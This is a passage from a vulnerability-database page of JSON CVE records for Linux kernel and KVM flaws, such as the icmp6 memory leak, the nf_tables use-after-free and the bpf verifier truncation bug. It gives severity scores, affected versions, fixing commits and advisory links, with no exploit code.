          "value": "Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-275",
              "description": "CWE-275 Permission Issues",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-25T20:08:00",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2022/03/15/3"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2d3916f3189172d5c69d33065c3c21119fe539fc"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20220425-0001/"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Memory leak in ICMP6 in Linux Kernel",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@google.com",
          "ID": "CVE-2022-0742",
          "STATE": "PUBLIC",
          "TITLE": "Memory leak in ICMP6 in Linux Kernel"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c=",
                            "version_value": "5.13"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-275 Permission Issues"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.openwall.com/lists/oss-security/2022/03/15/3",
              "refsource": "MISC",
              "url": "https://www.openwall.com/lists/oss-security/2022/03/15/3"
            },
            {
              "name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2d3916f3189172d5c69d33065c3c21119fe539fc",
              "refsource": "MISC",
              "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2d3916f3189172d5c69d33065c3c21119fe539fc"
            },
            {
              "name": "https://security.netapp.com/advisory/ntap-20220425-0001/",
              "refsource": "CONFIRM",
              "url": "https://security.netapp.com/advisory/ntap-20220425-0001/"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2022-0742",
    "datePublished": "2022-03-18T11:20:11",
    "dateReserved": "2022-02-23T00:00:00",
    "dateUpdated": "2024-08-02T23:40:03.643Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-3610
Vulnerability from cvelistv5
Published
2023-07-21 20:48
Modified
2024-08-02 07:01
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:01:56.594Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=4bedf9eee016286c835e3d8fa981ddece5338795"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/4bedf9eee016286c835e3d8fa981ddece5338795"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5461"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.4",
              "status": "affected",
              "version": "5.9",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2023-06-20T20:41:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eA use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eFlaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795.\u003c/p\u003e"
            }
          ],
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nFlaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.\n\nWe recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-07-21T20:48:13.121Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=4bedf9eee016286c835e3d8fa981ddece5338795"
        },
        {
          "url": "https://kernel.dance/4bedf9eee016286c835e3d8fa981ddece5338795"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5461"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-3610",
    "datePublished": "2023-07-21T20:48:13.121Z",
    "dateReserved": "2023-07-10T20:52:54.602Z",
    "dateUpdated": "2024-08-02T07:01:56.594Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-2618
Vulnerability from cvelistv5
Published
2018-07-27 19:00
Modified
2024-08-05 14:02
Severity
Summary
A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files before 4.9.10. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory.
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T14:02:07.208Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[selinux] 20170131 [PATCH] selinux: fix off-by-one in setprocattr",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://marc.info/?l=selinux\u0026m=148588165923772\u0026w=2"
          },
          {
            "name": "DSA-3791",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2017/dsa-3791"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2618"
          },
          {
            "name": "RHSA-2017:0932",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2017:0932"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=0c461cb727d146c9ef2d3e86214f498b78b7d125"
          },
          {
            "name": "RHSA-2017:0933",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2017:0933"
          },
          {
            "name": "RHSA-2017:0931",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2017:0931"
          },
          {
            "name": "96272",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/96272"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.9.10"
            }
          ]
        }
      ],
      "datePublic": "2017-01-31T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A flaw was found in the Linux kernel\u0027s handling of clearing SELinux attributes on /proc/pid/attr files before 4.9.10. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-193",
              "description": "CWE-193",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-07-28T09:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[selinux] 20170131 [PATCH] selinux: fix off-by-one in setprocattr",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://marc.info/?l=selinux\u0026m=148588165923772\u0026w=2"
        },
        {
          "name": "DSA-3791",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2017/dsa-3791"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2618"
        },
        {
          "name": "RHSA-2017:0932",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2017:0932"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=0c461cb727d146c9ef2d3e86214f498b78b7d125"
        },
        {
          "name": "RHSA-2017:0933",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2017:0933"
        },
        {
          "name": "RHSA-2017:0931",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2017:0931"
        },
        {
          "name": "96272",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/96272"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2017-2618",
    "datePublished": "2018-07-27T19:00:00",
    "dateReserved": "2016-12-01T00:00:00",
    "dateUpdated": "2024-08-05T14:02:07.208Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2010-0309
Vulnerability from cvelistv5
Published
2010-02-12 19:00
Modified
2024-08-07 00:45
Severity
Summary
The pit_ioport_read function in the Programmable Interval Timer (PIT) emulation in i8254.c in KVM 83 does not properly use the pit_state data structure, which allows guest OS users to cause a denial of service (host OS crash or hang) by attempting to read the /dev/port file.
References
URLTags
http://www.securityfocus.com/bid/38158vdb-entry, x_refsource_BID
http://www.ubuntu.com/usn/USN-914-1vendor-advisory, x_refsource_UBUNTU
http://www.vupen.com/english/advisories/2010/0638vdb-entry, x_refsource_VUPEN
https://rhn.redhat.com/errata/RHSA-2010-0088.htmlvendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/38922third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2010/02/02/4mailing-list, x_refsource_MLIST
http://www.debian.org/security/2010/dsa-1996vendor-advisory, x_refsource_DEBIAN
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11095vdb-entry, signature, x_refsource_OVAL
https://bugzilla.redhat.com/show_bug.cgi?id=560887x_refsource_CONFIRM
http://www.openwall.com/lists/oss-security/2010/02/02/1mailing-list, x_refsource_MLIST
http://www.mail-archive.com/kvm%40vger.kernel.org/msg28002.htmlmailing-list, x_refsource_MLIST
https://rhn.redhat.com/errata/RHSA-2010-0095.htmlvendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/38492third-party-advisory, x_refsource_SECUNIA
Impacted products
VendorProduct
n/an/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T00:45:12.089Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "38158",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/38158"
          },
          {
            "name": "USN-914-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-914-1"
          },
          {
            "name": "ADV-2010-0638",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2010/0638"
          },
          {
            "name": "RHSA-2010:0088",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0088.html"
          },
          {
            "name": "38922",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/38922"
          },
          {
            "name": "[oss-security] 20100202 Re: CVE request - kvm: cat /dev/port in the guest can cause host DoS",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2010/02/02/4"
          },
          {
            "name": "DSA-1996",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2010/dsa-1996"
          },
          {
            "name": "oval:org.mitre.oval:def:11095",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11095"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=560887"
          },
          {
            "name": "[oss-security] 20100202 CVE request - kvm: cat /dev/port in the guest can cause host DoS",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2010/02/02/1"
          },
          {
            "name": "[kvm] 20100129 KVM: PIT: control word is write-only",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.mail-archive.com/kvm%40vger.kernel.org/msg28002.html"
          },
          {
            "name": "RHSA-2010:0095",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://rhn.redhat.com/errata/RHSA-2010-0095.html"
          },
          {
            "name": "38492",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/38492"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2010-02-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The pit_ioport_read function in the Programmable Interval Timer (PIT) emulation in i8254.c in KVM 83 does not properly use the pit_state data structure, which allows guest OS users to cause a denial of service (host OS crash or hang) by attempting to read the /dev/port file."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-09-18T12:57:01",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "38158",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/38158"
        },
        {
          "name": "USN-914-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-914-1"
        },
        {
          "name": "ADV-2010-0638",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2010/0638"
        },
        {
          "name": "RHSA-2010:0088",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://rhn.redhat.com/errata/RHSA-2010-0088.html"
        },
        {
          "name": "38922",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/38922"
        },
        {
          "name": "[oss-security] 20100202 Re: CVE request - kvm: cat /dev/port in the guest can cause host DoS",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2010/02/02/4"
        },
        {
          "name": "DSA-1996",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2010/dsa-1996"
        },
        {
          "name": "oval:org.mitre.oval:def:11095",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11095"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=560887"
        },
        {
          "name": "[oss-security] 20100202 CVE request - kvm: cat /dev/port in the guest can cause host DoS",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2010/02/02/1"
        },
        {
          "name": "[kvm] 20100129 KVM: PIT: control word is write-only",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.mail-archive.com/kvm%40vger.kernel.org/msg28002.html"
        },
        {
          "name": "RHSA-2010:0095",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://rhn.redhat.com/errata/RHSA-2010-0095.html"
        },
        {
          "name": "38492",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/38492"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2010-0309",
    "datePublished": "2010-02-12T19:00:00",
    "dateReserved": "2010-01-12T00:00:00",
    "dateUpdated": "2024-08-07T00:45:12.089Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-3444
Vulnerability from cvelistv5
Published
2021-03-23 17:45
Modified
2024-09-16 17:27
Severity
Summary
Linux kernel bpf verifier incorrect mod32 truncation
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T16:53:17.550Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9b00f1b78809"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.openwall.com/lists/oss-security/2021/03/23/2"
          },
          {
            "name": "[oss-security] 20210323 [CVE-2021-3444] Linux kernel bpf verifier incorrect mod32 truncation",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2021/03/23/2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/162117/Kernel-Live-Patch-Security-Notice-LSN-0075-1.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20210416-0006/"
          },
          {
            "name": "[debian-lts-announce] 20211015 [SECURITY] [DLA 2785-1] linux-4.19 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/164950/Kernel-Live-Patch-Security-Notice-LSN-0082-1.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.12-rc1",
              "status": "affected",
              "version": "trunk",
              "versionType": "custom"
            },
            {
              "lessThan": "5.11.2",
              "status": "affected",
              "version": "5.11",
              "versionType": "custom"
            },
            {
              "lessThan": "5.10.19",
              "status": "affected",
              "version": "5.10",
              "versionType": "custom"
            },
            {
              "lessThan": "5.4.101",
              "status": "affected",
              "version": "5.4",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "De4dCr0w of 360 Alpha Lab"
        }
      ],
      "datePublic": "2021-03-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The bpf verifier in the Linux kernel did not properly handle mod32 destination register truncation when the source register was known to be 0. A local attacker with the ability to load bpf programs could use this gain out-of-bounds reads in kernel memory leading to information disclosure (kernel memory), and possibly out-of-bounds writes that could potentially lead to code execution. This issue was addressed in the upstream kernel in commit 9b00f1b78809 (\"bpf: Fix truncation handling for mod32 dst reg wrt zero\") and in Linux stable kernels 5.11.2, 5.10.19, and 5.4.101."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-681",
              "description": "CWE-681: Incorrect Conversion between Numeric Types",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-11-12T18:06:17",
        "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
        "shortName": "canonical"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9b00f1b78809"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.openwall.com/lists/oss-security/2021/03/23/2"
        },
        {
          "name": "[oss-security] 20210323 [CVE-2021-3444] Linux kernel bpf verifier incorrect mod32 truncation",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2021/03/23/2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/162117/Kernel-Live-Patch-Security-Notice-LSN-0075-1.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20210416-0006/"
        },
        {
          "name": "[debian-lts-announce] 20211015 [SECURITY] [DLA 2785-1] linux-4.19 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/164950/Kernel-Live-Patch-Security-Notice-LSN-0082-1.html"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "value": "Apply or update to a kernel that contains the commit 9b00f1b78809 (\"bpf: Fix truncation handling for mod32 dst reg wrt zero\")."
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Linux kernel bpf verifier incorrect mod32 truncation",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@ubuntu.com",
          "DATE_PUBLIC": "2021-03-23T00:00:00.000Z",
          "ID": "CVE-2021-3444",
          "STATE": "PUBLIC",
          "TITLE": "Linux kernel bpf verifier incorrect mod32 truncation"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_name": "trunk",
                            "version_value": "5.12-rc1"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "5.11",
                            "version_value": "5.11.2"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "5.10",
                            "version_value": "5.10.19"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "5.4",
                            "version_value": "5.4.101"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "De4dCr0w of 360 Alpha Lab"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The bpf verifier in the Linux kernel did not properly handle mod32 destination register truncation when the source register was known to be 0. A local attacker with the ability to load bpf programs could use this gain out-of-bounds reads in kernel memory leading to information disclosure (kernel memory), and possibly out-of-bounds writes that could potentially lead to code execution. This issue was addressed in the upstream kernel in commit 9b00f1b78809 (\"bpf: Fix truncation handling for mod32 dst reg wrt zero\") and in Linux stable kernels 5.11.2, 5.10.19, and 5.4.101."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
